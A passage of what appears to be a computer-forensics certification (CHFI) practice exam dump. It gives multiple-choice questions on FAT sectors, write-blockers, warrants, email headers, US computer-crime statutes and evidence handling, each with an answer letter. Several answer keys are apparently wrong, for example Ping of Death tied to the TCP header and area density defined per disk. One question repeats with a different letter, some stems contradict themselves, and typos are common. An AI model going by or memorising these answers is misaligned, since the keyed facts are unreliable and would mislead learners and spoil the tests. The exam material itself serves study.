C. the life of the author plus 70 years
D. copyrights last forever
C

How many sectors will a 125 KB file use in a FAT32 file system?
A. 32
B. 16
C. 250
D. 25
C

When performing a forensics analysis, what device is used to prevent the system from recording data on an evidence disk?
A. a write-blocker
B. a protocol analyzer
C. a firewall
D. a disk editor
A

You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap
image of the target computer, but have found no evidence. You suspect the files may not have
been saved. What should you examine next in this case?
A. The registry
B. Theswapfile
C. The recycle bin
D. The metadata
B

In a FAT32 system, a 123 KB file will use how many sectors?
A. 34
B. 246
C. 11
D. 56
B

Under which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud?
A. 18 U.S.C. 1029 Possession of Access Devices
B. 18 U.S.C. 1030 Fraud and related activity in connection with computers
C. 18 U.S.C. 1343 Fraud by wire, radio or television
D. 18 U.S.C. 1361 Injury to Government Property
E. 18 U.S.C. 1362 Government communication systems
F. 18 U.S.C. 1832 Trade Secrets Act
B

What TCP/UDP port does the toolkit program netstat use?
A. Port 7
B. Port 15
C. Port 23
D. Port 69
B

Office documents (Word, Excel, PowerPoint) contain a code that allows tracking the MAC, or unique identifier, of the machine that created the document. What is that code called?
A. the Microsoft Virtual Machine Identifier
B. the Personal Application Protocol
C. the Globally Unique ID
D. the Individual ASCII String
C

Which federal computer crime law specifically refers to fraud and related activity in connection with access devices like routers?
A. 18 U.S.C. 1029
B. 18 U.S.C. 1362
C. 18 U.S.C. 2511
D. 18 U.S.C. 2703
A

Which response organization tracks hoaxes as well as viruses?
A. NIPC
B. FEDCIRC
C. CERT
D. CIAC
D

What method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 sever the course of its lifetime?
A. forensic duplication of hard drive
B. analysis of volatile data
C. comparison of MD5 checksums
D. review of SIDs in the Registry
D

What header field in the TCP/IP protocol stack involves the hacker exploit known as the Ping of Death?
A. ICMP header field
B. TCP header field
C. IP header field
D. UDP header field
B

Why should you note all cable connections for a computer you want to seize as evidence?
A. to know what outside connections existed
B. in case other devices were connected
C. to know what peripheral devices exist
D. to know what hardware existed
A

You should make at least how many bit-stream copies of a suspect drive?
A. 1
B. 2
C. 3
D. 4
B

Which Intrusion Detection System (IDS) usually produces the most false alarms due to the unpredictable behaviors of users and networks?
A. network-based IDS systems (NIDS)
B. host-based IDS systems (HIDS)
C. anomaly detection
D. signature recognition
B

Jason is the security administrator of ACMA metal Corporation. One day he notices the companys Oracle database server has been compromised and the customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors. Jason wants to report this crime to the law enforcement agencies immediately. Which organization coordinates computer crimes investigations throughout the United States?
A. Internet Fraud Complaint Center
B. Local or national office of the U.S. Secret Service
C. National Infrastructure Protection Center
D. CERT Coordination Center
B

Which of the following should a computer forensics lab used for investigations have?
A. isolation
B. restricted access
C. open access
D. an entry log
B

Corporate investigations are typically easier than public investigations because:
A. the users have standard corporate equipment and software
B. the investigator does not have to get a warrant
C. the investigator has to get a warrant
D. the users can load whatever they want on their machines
B

Area density refers to:
A. the amount of data per disk
B. the amount of data per partition
C. the amount of data per square inch
D. the amount of data per platter
A

Sectors in hard disks typically contain how many bytes?
A. 256
B. 512
C. 1024
D. 2048
B

What does the superblock in Linux define?
A. filesynames
B. diskgeometr
C. location of the firstinode
D. available space
C

When obtaining a warrant it is important to:
A. particularlydescribe the place to be searched and particularly describe the items to be seized
B. generallydescribe the place to be searched and particularly describe the items to be seized
C. generallydescribe the place to be searched and generally describe the items to be seized
D. particularlydescribe the place to be searched and generally describe the items to be seized
A

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics laB. How many law-enforcement computer investigators should you request to staff the lab?
A. 8
B. 1
C. 4
D. 2
C

From the following spam mail header, identify the host IP that sent this spam? From
jie02@netvigator.com jie02@netvigator.com Tue Nov 27 17:27:11 2001 Received: from
viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with
ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT) Received: from
mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk
(8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)
Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk
From: "china hotel web"
To: "Shlam"
Subject: SHANGHAI (HILTON HOTEL) PACKAGE Date: Tue, 27 Nov 2001 17:25:58 +0800
MIME-Version: 1.0 X-Priority: 3 X-MSMail- Priority: Normal ReplyTo:
"china hotel web"
A. 137.189.96.52
B. 8.12.1.0
C. 203.218.39.20
D. 203.218.39.50
C

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?
A. The system files have been copied by a remote attacker
B. The system administrator has created an incremental backup
C. The system has been compromised using a t0rnrootkit
D. Nothing in particular as these can be operational files
D

What binary coding is used most often for e-mail purposes?
A. MIME
B. Uuencode
C. IMAP
D. SMTP
A

If you discover a criminal act while investigating a corporate policy abuse, it becomes a public sector investigation and should be referred to law enforcement?
A. true
B. false
A

During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore you report this evidence. This type of evidence is known as:
A. Inculpatory evidence
B. mandatory evidence
C. exculpatory evidence
D. Terrible evidence
C

What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?
A. rootkit
B. key escrow
C. steganography
D. Offset
C

Which of the following filesystem is used by Mac OS X?
A. EFS
B. HFS+
C. EXT2
D. NFS
B

Hackers can gain access to Windows Registry and manipulate user passwords, DNS settings, access rights or others features that they may need in order to accomplish their objectives. One simple method for loading an application at startup is to add an entry (Key) to the following
Registry Hive:
A. HKEY_LOCAL_MACHINEhardwarewindowsstart
B. HKEY_LOCAL_USERSSoftware|MicrosoftoldVersionLoad
C. HKEY_CURRENT_USERMicrosoftDefault
D. HKEY_LOCAL_MACHINESoftwareMicrosoftCurrentVersionRun
D

You are a computer forensics investigator working with local police department and you are called to assist in an investigation of threatening emails. The complainant has printer out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer because you need access to the ______________ in order to track the
emails back to the suspect.
A. Routing Table
B. Firewall log
C. Configuration files
D. Email Header
D

The rule of thumb when shutting down a system is to pull the power plug. However, it has certain drawbacks. Which of the following would that be?
A. Any data not yet flushed to the system will be lost
B. All running processes will be lost
C. The /tmp directory will be flushed
D. Power interruption will corrupt the pagefile
A

The efforts to obtain information before a trail by demanding documents, depositions, questioned and answers written under oath, written requests for admissions of fact and examination of the scene is a description of what legal term?
A. Detection
B. Hearsay
C. Spoliation
D. Discovery
D

Microsoft Outlook maintains email messages in a proprietary format in what type of file?
A. .email
B. .mail
C. .pst
D. .doc
C

Law enforcement officers are conducting a legal search for which a valid warrant was obtained. While conducting the search, officers observe an item of evidence for an unrelated crime that was not included in the warrant. The item was clearly visible to the officers and immediately identified as evidence. What is the term used to describe how this evidence is admissible?
A. Plain view doctrine
B. Corpus delicti
C. Locard Exchange Principle
D. Ex Parte Order
A

You are working as an independent computer forensics investigator and receive a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a simple backup copy of the hard drive in the PC and put it on this drive and requests that you examine that drive for evidence of the suspected images. You inform
him that a simple backup copy will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceedings?
A. Bit-stream Copy
B. Robust Copy
C. Full backup Copy
D. Incremental Backup Copy
A

You are assisting in the investigation of a possible Web Server Hack. The company who called you stated that customers reported to them that whenever they entered the web address of the company in their browser, what they received was a porno graphic web site. The company checked the web server and nothing appears wrong. When you type in the IP address of the web site in your browser everything appears normal. What is the name of the attack that affects the DNS cache of the name resolution servers, resulting in those servers directing users to the wrong web site?
A. ARP Poisoning
B. DNS Poisoning
C. HTTP redirect attack
D. IP Spoofing
B

In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider (ISP). You contact ISP and request that they provide you assistance with your investigation. What assistance can the ISP provide?
A. The ISP can investigate anyone using their service and can provide you with assistance
B. The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you without a warrant
C. The ISP cant conduct any type of investigations on anyone and therefore cant assist you
D. ISPs never maintain log files so they would be of no use to your investigation
B

As a CHFI professional, which of the following is the most important to your professional reputation?
A. Your Certifications
B. The correct, successful management of each and every case
C. The free that you charge
D. The friendship of local law enforcement officers
B

You are conducting an investigation of fraudulent claims in an insurance company that involves complex text searches through large numbers of documents. Which of the following tools would allow you to quickly and efficiently search for a string within a file on the bitmap image of the target computer?
A. Stringsearch
B. grep
C. dir
D. vim
B

When cataloging digital evidence, the primary goal is to:
A. Make bit-stream images of all hard drives
B. Preserve evidence integrity
C. Not remove the evidence from the scene
D. Not allow the computer to be turned off
B
(Explanation:
Topic 5, Volume E
)

The police believe that Mevin Mattew has been obtaining unauthorized access to computers belonging to numerous computer software and computer operating systems manufacturers, cellular telephone manufacturers, Internet Service Providers and Educational Institutions. They also suspect that he has been stealing, copying and misappropriating proprietary computer software belonging to the several victim companies. What is preventing the police from breaking down the suspects door and searching his home and seizing all of his computer equipment if they have not yet obtained a warrant?
A. The Fourth Amendment
B. The USA patriot Act
C. The Good Samaritan Laws
D. The Federal Rules of Evidence
A

A law enforcement officer may only search for and seize criminal evidence with _____________, which are facts or circumstances that would lead a reasonable person to believe a crime has been committed or is about to be committed, evidence of the specific crime exists and the evidence of the specific crime exists at the place to be searched.
A. Mere Suspicion
B. A preponderance of the evidence
C. Probable cause
D. Beyond a reasonable doubt
C

You are working as a Computer forensics investigator for a corporation on a computer abuse case. You discover evidence that shows the subject of your investigation is also embezzling money from the company. The company CEO and the corporate legal counsel advise you to contact law enforcement and provide them with the evidence that you have found. The law enforcement officer that responds requests that you put a network sniffer on your network and
monitor all traffic to the subjects computer. You inform the officer that you will not be able to comply with that request because doing so would:
A. Violate your contract
B. Cause network congestion
C. Make you an agent of law enforcement
D. Write information to the subjects hard drive
C

You have been asked to investigate after a user has reported a threatening e-mail they have received from an external source. Which of the following are you most interested in when trying to trace the source of the message?
A. The X509 Address
B. The SMTP reply Address
C. The E-mail Header
D. The Host Domain Name
C

You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensics lab due to sensitivity of the case. How would you permanently erase the data on the hard disk?
A. Throw the hard disk into the fire
B. Run the powerful magnets over the hard disk
C. Format the hard disk multiple times using a low level disk utility
D. Overwrite the contents of the hard disk with Junk data
A

Office Documents (Word, Excel and PowerPoint) contain a code that allows tracking the MAC or unique identifier of the machine that created the document. What is that code called?
A. Globally unique ID
B. Microsoft Virtual Machine Identifier
C. Personal Application Protocol
D. Individual ASCII string
A

When using Windows acquisitions tools to acquire digital evidence, it is important to use a well tested hardware write-blocking device to:
A. Automate Collection from image files
B. Avoiding copying data from the boot partition
C. Acquire data from host-protected area on a disk
D. Prevent Contamination to the evidence drive
D

An Expert witness give an opinion if:
A. The Opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors
B. To define the issues of the case for determination by the finder of fact
C. To stimulate discussion between the consulting expert and the expert witness
D. To deter the witness form expanding the scope of his or her investigation beyond the requirements of the case
A

Printing under a Windows Computer normally requires which one of the following files types to be created?
A. EME
B. MEM
C. EMF
D. CME
C

Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from their various activity. After a computer has been compromised by a hacker, which of the following would be most important in forming a profile of the incident?
A. The manufacturer of the system compromised
B. The logic, formatting and elegance of the code used in the attack
C. The nature of the attack
D. The vulnerability exploited in the incident
B

To preserve digital evidence, an investigator should ____________________
A. Make tow copies of each evidence item using a single imaging tool
B. Make a single copy of each evidence item using an approved imaging tool
C. Make two copies of each evidence item using different imaging tools
D. Only store the original evidence item
C

What is the name of the Standard Linux Command that is also available as windows application that can be used to create bit-stream images?
A. mcopy
B. image
C. MD5
D. dd
D

____________________ is simply the application of Computer Investigation and analysis techniques in the interests of determining potential legal evidence.
A. Network Forensics
B. Computer Forensics
C. Incident Response
D. Event Reaction
B

During the course of a corporate investigation, you find that an Employee is committing a crime.
Can the Employer file a criminal complain with Police?
A. Yes, and all evidence can be turned over to the police
B. Yes, but only if you turn the evidence over to a federal law enforcement agency
C. No, because the investigation was conducted without following standard police procedures
D. No, because the investigation was conducted without warrant
A

The ____________________ refers to handing over the results of private investigations to the authorities because of indications of criminal activity.
A. Locard Exchange Principle
B. Clark Standard
C. Kelly Policy
D. Silver-Platter Doctrine
D

This organization maintains a database of hash signatures for known software:
A. International Standards Organization
B. Institute of Electrical and Electronics Engineers
C. National Software Reference Library
D. American National standards Institute
C

One technique for hiding information is to change the file extension from the correct one to one that might not be noticed by an investigator. For example, changing a .jpg extension to a .doc extension so that a picture file appears to be a document. What can an investigator examine to verify that a file has the correct extension?
A. the File Allocation Table
B. the file header
C. the file footer
D. the sector map
B

You are employed directly by an attorney to help investigate an alleged sexual harassment case at a large pharmaceutical manufacture. While at the corporate office of the company, the CEO demands to know the status of the investigation. What prevents you from discussing the case with the CEO?
A. the attorney-work-product rule
B. Good manners
C. Trade secrets
D. ISO 17799
A

Melanie was newly assigned to an investigation and asked to make a copy of all the evidence from the compromised system. Melanie did a DOS copy of all the files on the system. What would be the primary reason for you to recommend a disk imaging tool?
A. A disk imaging tool would check for CRC32s for internal self checking and validation and have MD5 checksum
B. Evidence file format will contain case data entered by the examiner and encrypted at the beginning of the evidence file
C. A simple DOS copy will not include deleted files, file slack and other information
D. There is no case for an imaging tool as it will use a closed, proprietary format that if compared to the original will not match up sector for sector
C

What information do you need to recover when searching a victims computer for a crime committed with specific e-mail message?
A. Internet service provider information
B. E-mail header
C. Username and password
D. Firewall log
B

One way to identify the presence of hidden partitions on a suspects hard drive is to:
A. Add up the total size of all known partitions and compare it to the total size of the hard drive
B. Examine the FAT and identify hidden partitions by noting an H in the partition Type field
C. Examine the LILO and note an H in the partition Type field
D. It is not possible to have hidden partitions on a hard drive
A

What does mactime, an essential part of the coroners toolkit, do?
A. It traverses the file system and produces a listing of all files based on the modification, access and change timestamps
B. It can recover deleted file space and search it for data. However, it does not allow the investigator t preview them
C. The tools scans for i-node information, which is used by other tools in the tool kit
D. It is tool specific to the MAC OS and forms a core component of the toolkit
A

The use of warning banners helps a company avoid litigation by overcoming an employees
assumed____________ When connecting to the companys intranet, network or Virtual Private
Network(VPN) and will allow the companys investigators to monitor, search and retrieve
information stored within the network.
A. Right to work
B. Right of free speech
C. Right to Internet Access
D. Right of Privacy
D

Chris has been called upon to investigate a hacking incident reported by one of his clients. The company suspects the involvement of an insider accomplice in the attack. Upon reaching the incident scene, Chris secures the physical area, records the scene using visual mediA. He shuts the system down by pulling the power plug so that he does not disturb the system in any way. He labels all cables and connectors prior to disconnecting any. What do you think would be the next sequence of events?
A. Connect the target media; prepare the system for acquisition; Secure the evidence; Copy the media
B. Prepare the system for acquisition; Connect the target media; copy the media; Secure the evidence
C. Connect the target media; Prepare the system for acquisition; Secure the evidence; Copy the media
D. Secure the evidence; prepare the system for acquisition; Connect the target media; copy the media
B

When investigating a Windows System, it is important to view the contents of the page or swap file because:
A. Windows stores all of the systems configuration information in this file
B. This is file that windows use to communicate directly with Registry
C. A Large volume of data can exist within the swap file of which the computer user has no knowledge
D. This is the file that windows use to store the history of the last 100 commands that were run from the command line
C

A state department site was recently attacked and all the servers had their disks erased. The incident response team sealed the area and commenced investigation. During evidence collection they came across a zip disks that did not have the standard labeling on it. The incident team ran the disk on an isolated system and found that the system disk was accidentally erased. They decided to call in the FBI for further investigation. Meanwhile, they short listed possible suspects including three summer interns. Where did the incident team go wrong?
A. They examined the actual evidence on an unrelated system
B. They attempted to implicate personnel without proof
C. They tampered with evidence by using it
D. They called in the FBI without correlating with the fingerprint data
C

Which of the following refers to the data that might still exist in a cluster even though the original file has been overwritten by another file?
A. Sector
B. Metadata
C. MFT
D. Slack Space
D

What should you do when approached by a reporter about a case that you are working on or have worked on?
A. Refer the reporter to the attorney that retained you
B. Say, "no comment"
C. Answer all the reporters questions as completely as possible
D. Answer only the questions that help your case
A

This is original file structure database that Microsoft originally designed for floppy disks. It is written to the outermost track of a disk and contains information about each file stored on the drive.
A. Master Boot Record (MBR)
B. Master File Table (MFT)
C. File Allocation Table (FAT)
D. Disk Operating System (DOS)
C

You are working in the security Department of law firm. One of the attorneys asks you about the topic of sending fake email because he has a client who has been charged with doing just that. His client alleges that he is innocent and that there is no way for a fake email to actually be sent. You inform the attorney that his client is mistaken and that fake email is possibility and that you can prove it. You return to your desk and craft a fake email to the attorney that appears to come from his boss. What port do you send the email to on the company SMTP server?
A. 10
B. 25
C. 110
D. 135
B

Volatile Memory is one of the leading problems for forensics. Worms such as code Red are memory resident and do write themselves to the hard drive, if you turn the system off they disappear. In a lab environment, which of the following options would you suggest as the most appropriate to overcome the problem of capturing volatile memory?
A. Use Vmware to be able to capture the data in memory and examine it
B. Give the Operating System a minimal amount of memory, forcing it to use a swap file
C. Create a Separate partition of several hundred megabytes and place the swap file there
D. Use intrusion forensic techniques to study memory resident infections
C

Diskcopy is:
A. a utility byAccessData
B. a standard MS-DOS command
C. Digital Intelligence utility
D. dd copying tool
B

You are working as Computer Forensics investigator and are called by the owner of an accounting firm to investigate possible computer abuse by one of the firms employees. You meet with the owner of the firm and discover that the company has never published a policy stating that they reserve the right to inspect their computing assets at will.
What do you do?
A. Inform the owner that conducting an investigation without a policy is not a problem because the company is privately owned
B. Inform the owner that conducting an investigation without a policy is a violation of the 4th amendment
C. Inform the owner that conducting an investigation without a policy is a violation of the employees expectation of privacy
D. Inform the owner that conducting an investigation without a policy is not a problem because a policy is only necessary for government agencies
C

Popular